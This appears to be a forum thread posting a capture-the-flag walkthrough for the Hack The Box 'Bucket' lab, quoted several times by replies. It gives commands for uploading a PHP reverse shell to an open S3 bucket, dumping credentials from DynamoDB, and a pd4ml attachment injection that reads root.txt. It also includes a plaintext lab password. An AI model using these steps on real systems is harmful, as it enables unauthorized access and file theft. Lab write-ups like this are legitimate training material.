[y0ukn0wm3]

# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 

Donate Me Hidden Content

You must register or login to view this content.

[helloclarice]

Thank u so much ...

I was wracking my head over this one ... finally rooted !

[Asur]

# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 
[Hidden Content]

Hi
How did you get aws configure values?

[Vexer4]

# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 
[Hidden Content]

Hi
How did you get aws configure values?

Check out amazon documentation on awscli because this are the default values that you get from reading the documentation.

[hack3rw0n]

# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 
[Hidden Content]

Hi, when i try aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request  , it said could not connect to endpoint http://s3.bucket.htb .... Any thoughts?

[y0ukn0wm3]

Hi, when i try aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request  , it said could not connect to endpoint http://s3.bucket.htb .... Any thoughts?

did you add s3.buckets.htb in your hosts file. Check for its ping and give it a try

[hack3rw0n]

Hi, when i try aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request  , it said could not connect to endpoint http://s3.bucket.htb .... Any thoughts?

did you add s3.buckets.htb in your hosts file. Check for its ping and give it a try

Yes, it seems to be working... Thanks y0ukn0wm3

[y0ukn0wm3]

Yes, it seems to be working... Thanks y0ukn0wm3

Anytime <3 mate Got you covered !